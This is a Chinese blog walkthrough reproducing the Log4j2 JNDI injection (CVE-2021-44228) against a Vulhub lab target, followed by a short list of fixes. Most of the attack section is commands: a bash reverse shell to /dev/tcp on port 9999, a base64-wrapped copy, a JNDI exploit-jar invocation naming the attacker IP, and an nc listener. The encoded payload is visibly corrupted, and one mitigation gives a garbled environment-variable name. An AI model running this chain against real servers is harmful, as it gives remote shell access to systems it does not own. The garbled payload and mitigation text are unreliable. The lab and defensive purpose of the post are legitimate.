log4j2漏洞复现 (CVE-2021-44228)

一.漏洞原理:

Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含关键词 ${,攻击者就能将关键字所包含的内容当作变量来替换成任何攻击命令,并且执行Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。

二.靶场环境:

靶机:CentOS 7   搭建Vulhub环境

攻击机:Kali

启动环境后出现下方图片,证明搭建成功了

三. 漏洞测试

用kali访问该地址

 

漏洞点位在action参数,我这里利用dnslog来验证

 

构造一个LDAP或者RMI服务器

 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

构造payload:bash -i >& /dev/tcp/ip(地址)/9999 0>&1

转换一下编码

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTqWeRvTs42OS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i} 

开启工具

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTqWeRvTs42OS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.0.0"

-C payload -A 攻击机的IP

 这里有多个java版本的exp,如果不成功可以换个版本

监听端口

nc -lvnp 9999

在url地址中输入payload

 

反弹shell成功

修复:

 1. 升级最新版本
 2. 设置jvm参数"-Dlog4j2.formatMsgNoLookups=true";
 3. 设置系统环境变量"FORMAT_MESSAGES_PATTERN_DIS-ABLE_LOOKU_PS"为"true"
 4. 关闭应用的网络外连。
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值